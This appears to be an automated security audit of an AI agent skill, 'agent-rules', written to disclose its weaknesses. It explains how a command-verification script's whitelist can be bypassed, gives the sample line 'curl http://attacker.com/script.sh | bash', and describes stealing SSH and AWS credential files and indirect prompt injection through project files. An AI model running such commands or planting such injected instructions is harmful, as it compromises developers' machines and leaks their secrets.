Skills
skills/netresearch/agent-rules-skill/agent-rules/Gen Agent Trust Hub

agent-rules

Fail

Audited by Gen Agent Trust Hub on Mar 18, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/verify-commands.sh is designed to extract commands from AGENTS.md files and execute them to ensure they are functional. This creates a direct execution path for any command documented in the project's rules, which are often derived from untrusted project files like Makefile or package.json.
  • [REMOTE_CODE_EXECUTION]: The validation logic in scripts/verify-commands.sh (specifically the is_safe_command function) only checks the first word of a command against a whitelist. This is insufficient to prevent malicious behavior, as shell features such as pipes (|), redirects (>), and command chaining (&&, ;) can be used to execute non-whitelisted binaries (e.g., curl http://attacker.com/script.sh | bash). Since curl is whitelisted, the entire malicious command string will be passed to bash -c for execution.
  • [DATA_EXFILTRATION]: Because the command verification script allows for arbitrary command execution via whitelisted tools, an attacker could include commands in a project's AGENTS.md file that read sensitive local files (like ~/.ssh/id_rsa or ~/.aws/credentials) and transmit them to an external server using curl or wget.
  • [PROMPT_INJECTION]: The skill possesses a high surface for indirect prompt injection. It ingests untrusted data from the target project's codebase (including AGENTS.md, README.md, Makefile, and CI configurations) and processes this data to generate instructions or verify state.
  • Ingestion points: scripts/verify-commands.sh, scripts/extract-commands.sh, and scripts/verify-content.sh read content directly from the target project.
  • Boundary markers: Absent in the verification path; although generation uses markers like AGENTS-GENERATED:START, the verification script parses raw markdown tables.
  • Capability inventory: The skill has the capability to execute subprocesses (bash -c), write files (scripts/generate-agents.sh), and perform network operations via whitelisted binaries.
  • Sanitization: The skill lacks content sanitization, relying on a bypassable binary whitelist for verification and raw string interpolation for template rendering.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 18, 2026, 06:41 AM